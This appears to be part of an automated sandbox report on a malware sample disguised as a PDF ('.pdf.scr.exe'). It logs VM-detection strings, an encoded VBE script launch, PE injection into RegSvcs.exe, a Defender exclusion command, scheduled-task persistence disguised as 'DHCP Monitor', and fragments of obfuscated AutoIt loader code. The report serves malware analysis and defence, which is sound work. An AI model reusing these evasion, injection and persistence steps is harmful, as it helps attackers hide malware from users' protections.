      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exel
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeV
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exeE97637D6
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exed
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo,0_2_003EE6A3
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003DA69B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003EC220
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FB348 FindFirstFileExA,0_2_003FB348
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C0E387
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C0D836
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C1A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00C1A488
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,6_2_00C165F1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDC642 FindFirstFileExW,6_2_00BDC642
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00C172E9
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C17248 FindFirstFileW,FindClose,6_2_00C17248
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BA5D78
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h]0_2_003F7DEE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h]6_2_00BC5078
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003EF838
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FC030 GetProcessHeap,0_2_003FC030
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1F3FF BlockInput,6_2_00C1F3FF
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF9D5 SetUnhandledExceptionFilter,0_2_003EF9D5
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003EF838
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003EFBCA
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003F8EBD
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0D65 SetUnhandledExceptionFilter,6_2_00BC0D65
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BD29B2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BC0BCF
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00BC0FB1

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Starts an encoded Visual Basic Script (VBE)
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbeJump to behavior
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000Jump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de0fe3ac427d61269f,z}
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269f[zj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de03e8ac4574770cjz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fyz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fhz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4f378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c70ae2a444794b787aaca0877a44687555378ea10302
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c61ef5a7537d61269fz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175r.ktl<ym
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720edad536c4d3ba38dbd0857846da9657f750_51+yz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eeab5f7c770ab38aea25559365ae7f7e49fae
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binaryenc61ef5a7537d6ey
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntunmapviewofsectiond6|y
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user32.dll61ef5a7537d6sy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ndowprocwjy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sssssseplacee838/////ay
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execquery\localhost\ro
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sexemodule61ef5a7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: asmrylen
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iswow64process
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptrde0fe3ac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bufferasmetptr
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binbufferetptrac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreatea7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c71deeb255419xi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll0xn
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex7xg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptr.x|
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_decryptdatad ad\xj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountincsxc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountecjx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_fixreloc adax
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountdecxx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displayname
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_derivekeydx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\tempsk
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~14 ad
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64w64
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea2beba94941
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\temp\k
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majoroperatingsystemver
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majorlinkerversionr<gj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addressofnewexeheader3gc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de1ec28a69*gx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: extendedregisters!gq
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberofsectionsaderxgv
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pointertosymboltable_go
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sizeofoptionalheader
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: flagsvg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segfsig
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seggsbg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segds
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edi@x
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esi@_p
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edxh~
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ecx3a
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seges
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eflags
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segss
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segcs
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @_0fo
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: magic
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spareh
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bool*
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutantx
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msctfime ui
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `\[tp\[t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \[t][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ][t ][t0][t@][t
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s3tt!n
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryoihgsvw.exeder10_51
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [i[pi
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
